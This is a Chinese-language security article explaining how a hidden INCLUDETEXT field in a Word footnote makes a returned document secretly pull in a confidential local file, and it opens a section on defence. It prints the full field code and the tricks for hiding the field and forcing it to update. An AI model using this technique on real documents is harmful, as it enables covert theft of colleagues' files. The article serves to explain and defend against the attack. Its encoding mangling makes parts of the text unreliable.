一、無聲的攻擊 　　下屬B給領(lǐng)導(dǎo)A發(fā)了一個(gè)Word文檔，按照正常的辦公流程，領(lǐng)導(dǎo)A應(yīng)該在修訂、簽署文檔后把它發(fā)回給下屬B。領(lǐng)導(dǎo)A先給Word文檔殺毒，確認(rèn)文檔安全之后才打開它。但是，當(dāng)最后領(lǐng)導(dǎo)A把已簽字的文檔發(fā)回給下屬B時(shí)，這個(gè)Word文檔卻順手牽羊，偷走了領(lǐng)導(dǎo)A電腦上的一份機(jī)密文檔c:a.txt。 　　那么，下屬B是怎樣完成這次竊密的呢？原來，下屬B在文檔中插入了一個(gè)INCLUDETEXT域。這個(gè)域插入到了文檔最后一頁的腳注之中，域的完整代碼是：{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }。其中INCLUDETEXT域的作用就是把指定的文件嵌入到當(dāng)前文檔，但它不是宏，所以不會引起Word的安全警告。 　　用INCLUDETEXT域?qū)嵤┕�擊時(shí)，有兩個(gè)關(guān)鍵的問題需要解決：第一，必須隱藏INCLUDETEXT域，避免INCLUDETEXT域被領(lǐng)導(dǎo)A發(fā)現(xiàn)；第二，INCLUDETEXT域必須在經(jīng)過一次更新操作后才會引入目標(biāo)文件。 　　首先來看第一個(gè)問題。要隱藏INCLUDETEXT域，可以根據(jù)Word文檔的結(jié)構(gòu)特點(diǎn)，采用多種辦法，例如隱藏文字、小而無色的字體等。一種比較通用的辦法是，將INCLUDETEXT域嵌入到一個(gè)“啞”的IF域。所謂啞的IF域，就是輸出結(jié)果總是空字符串的IF域。 　　至于INCLUDETEXT域的更新問題，對于大型的、包含許多正常域的Word文檔，這通常不存在問題，因?yàn)槭盏轿臋n的人一般會更新所有的域。但是，下屬B采用了一個(gè)更好的辦法，即在INCLUDETEXT域里面嵌入了一個(gè)DATE域，且這個(gè)DATE域是文檔中的最后一個(gè)DATE域，于是整個(gè)域就變成了自動更新的域。 　　下面我們來看看如何避免這種信息泄漏。 二、堅(jiān)固的防御 　　顯然，這種攻擊如果要得逞，攻擊者必須知道機(jī)密文檔的確切名稱和路徑。但是，對于一起工作的同事來說，攻擊成功的可能性大大增加。例如，如果某個(gè)人沒有訪問服務(wù)器上共享文件的權(quán)限，但知道共享目錄和文件的位置、名稱，他就可以借助這種攻擊，利用另一個(gè)人的身份獲得共享文件。